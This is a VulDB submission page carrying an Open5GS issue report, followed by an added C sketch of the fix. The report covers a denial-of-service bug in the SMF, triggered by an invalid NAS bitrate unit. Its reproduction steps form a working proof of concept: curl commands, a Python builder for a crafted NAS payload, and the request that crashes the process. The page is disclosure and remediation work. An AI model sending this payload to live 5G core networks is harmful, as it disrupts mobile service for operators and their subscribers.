Submit #808489: Open5gs SMF v2.7.7 Denial of Service

Title: Open5gs SMF v2.7.7 Denial of Service

Description:

### Open5GS Release, Revision, or Tag

v2.7.7

### Steps to reproduce

### Description

SMF crashes when a `PDU Session Modification Request` delivered through `SmContextUpdateData.n1SmMsg` carries a syntactically valid `requested_qos_flow_descriptions` IE whose bitrate parameter uses an invalid NAS bitrate unit.

The parser accepts the 3-byte bitrate structure without validating the unit in `ogs_nas_parse_qos_flow_descriptions()`. Later `gsm_handle_pdu_session_modification_qos_flow_descriptions()` calls `ogs_nas_bitrate_to_uint64()` on the attacker-controlled bitrate:

```c
case OGS_NAX_QOS_FLOW_PARAMETER_ID_GFBR_UPLINK:
    qos_flow->qos.gbr.uplink = ogs_nas_bitrate_to_uint64(
            &qos_flow_description[i].param[j].br);
    break;
```

`ogs_nas_bitrate_to_uint64()` fatally aborts on unknown units:

```c
ogs_fatal("Unknown unit [%d]", nas_bitrate->unit);
ogs_assert_if_reached();
```

This issue is distinct from the previously confirmed `nsmf-pdusession-pdu-sessions-createddata-invalid-qosflowdescription-assert-abort` report. That older issue is on the H-SMF `201 Created` callback path; this one is on the AMF-facing `sm-contexts/{ref}/modify` N1 business path.

### Steps to reproduce

1. Start the Docker lab and ensure `smf` and `smf-audit-ue` are running.

2. Resolve the current SMF container IP and an active `smContextRef`:

```bash
SMF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' smf)
docker restart smf-audit-ue >/dev/null
sleep 3
REF=$(
  for i in $(seq 1 30); do
    code=$(curl --http2-prior-knowledge -m 5 -sS -o /tmp/probe.body -w '%{http_code}' \
      -X POST "http://$SMF_IP/nsmf-pdusession/v1/sm-contexts/$i/modify" \
      -H 'Content-Type: application/json' \
      --data '{"hoState":"COMPLETED"}')
    if [ "$code" != 404 ]; then
      echo "$i"
      break
    fi
  done
)
echo "SMF_IP=$SMF_IP REF=$REF"
```

3. Prepare a multipart `SmContextUpdateData` with only `n1SmMsg`, using the malicious NAS payload below. The payload is a `PDU Session Modification Request` whose `requested_qos_flow_descriptions` contains a GFBR uplink parameter with bitrate `unit=0`, which is not a valid NAS bitrate unit:

```bash
python3 - <<'PY'
from pathlib import Path
import json

boundary = 'REQBOUNDARY'
body = {'n1SmMsg': {'contentId': '5gnas-sm'}}
n1 = bytes.fromhex('2e0101c97900080160410203000001')

parts = []
parts.append(
    (f'--{boundary}\r\nContent-Type: application/json\r\n\r\n'.encode())
    + json.dumps(body, separators=(',', ':')).encode()
    + b'\r\n'
)
parts.append(
    (f'--{boundary}\r\nContent-Id: 5gnas-sm\r\n'
     f'Content-Type: application/vnd.3gpp.5gnas\r\n\r\n'.encode())
    + n1
    + b'\r\n'
)
parts.append(f'--{boundary}--\r\n'.encode())
Path('/tmp/smctx_modify_invalid_bitrate.multipart').write_bytes(b''.join(parts))
PY
```

4. Send the request:

```bash
curl --http2-prior-knowledge -m 10 -sS -i \
  -X POST "http://$SMF_IP/nsmf-pdusession/v1/sm-contexts/$REF/modify" \
  -H 'Content-Type: multipart/related; boundary=REQBOUNDARY' \
  --data-binary @/tmp/smctx_modify_invalid_bitrate.multipart
```

5. Check the SMF process state and logs:

```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --tail 120 smf
```

### Logs

```shell
Client side:
curl: (92) HTTP/2 stream 1 was not closed cleanly

SMF state:
exited 139 2026-04-11T07:52:16.722895347Z

SMF log:
04/11 07:52:16.598: [nas] FATAL: Unknown unit [0] (../lib/nas/common/types.c:502)
04/11 07:52:16.598: [nas] FATAL: ogs_nas_bitrate_to_uint64: should not be reached. (../lib/nas/common/types.c:503)
```

### Expected behaviour

SMF should reject invalid NAS bitrate units in the `n1SmMsg` `PDU Session Modification Request` and fail only that transaction.

### Observed Behaviour

The crafted `n1SmMsg` aborts the entire SMF process before any HTTP response is completed, leaving the client with a transport error and the SMF container exiting with code `139`.

### eNodeB/gNodeB

Not required.

### UE Models and versions

Not required.

Source: ⚠️ https://github.com/open5gs/open5gs/issues/4452
User: FrankLin (UID 97501)
Submission: 20/04/2026 21:22 (1 month ago)
Moderation: 11/05/2026 10:02 (21 days later)
Status: accepted
VulDB entry: 362585 [Open5GS up to 2.7.7 SMF src/smf/gsm-handler.c n1SmMsg denial of service]
Points: 20
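
The missing check described in the report, sketched as an added C example (not Open5GS code and not part of the submission): a bitrate decoder that returns an error for an invalid unit or an overflowing result, so the caller can fail one transaction instead of aborting the process. The function names, status codes, the unit table (1 = 1 Kbps up to 25 = 256 Pbps) and the unit-then-16-bit-value byte layout are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical names for illustration; this is not Open5GS code. */
enum br_status { BR_OK = 0, BR_TRUNCATED, BR_BAD_UNIT, BR_OVERFLOW };

/* Assumed unit table: 1 = 1 Kbps, then x4 per step (1, 4, 16, 64, 256),
 * restarting at the next decimal prefix every five units, up to
 * 25 = 256 Pbps. 0 and anything above 25 are rejected here. */
static enum br_status unit_to_bps(uint8_t unit, uint64_t *mult)
{
    if (unit < 1 || unit > 25)
        return BR_BAD_UNIT;
    uint64_t m = 1000;                       /* 1 Kbps */
    for (unsigned i = 0; i < (unit - 1u) / 5; i++)
        m *= 1000;                           /* Kbps -> Mbps -> ... -> Pbps */
    m <<= 2 * ((unit - 1u) % 5);             /* x1, x4, x16, x64, x256 */
    *mult = m;
    return BR_OK;
}

/* Decode the 3-byte parameter contents: unit (1 byte) followed by a
 * big-endian 16-bit value. Returns a status instead of aborting. */
enum br_status decode_bitrate(const uint8_t *buf, size_t len, uint64_t *bps)
{
    uint64_t mult;
    enum br_status st;

    if (buf == NULL || len < 3)
        return BR_TRUNCATED;
    if ((st = unit_to_bps(buf[0], &mult)) != BR_OK)
        return st;                           /* reject before any conversion */
    uint64_t value = ((uint64_t)buf[1] << 8) | buf[2];
    if (value != 0 && mult > UINT64_MAX / value)
        return BR_OVERFLOW;                  /* 256 Pbps x 65535 exceeds 64 bits */
    *bps = mult * value;
    return BR_OK;
}

int main(void)
{
    /* Last three bytes of the n1 payload on this page: unit=0, value=1. */
    const uint8_t from_page[3] = { 0x00, 0x00, 0x01 };
    uint64_t bps = 0;
    printf("status=%d\n", decode_bitrate(from_page, sizeof from_page, &bps));
    return 0;
}
```

A caller that receives anything other than `BR_OK` would reject the `PDU Session Modification Request` and keep serving other sessions, which is the expected behaviour the report asks for.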
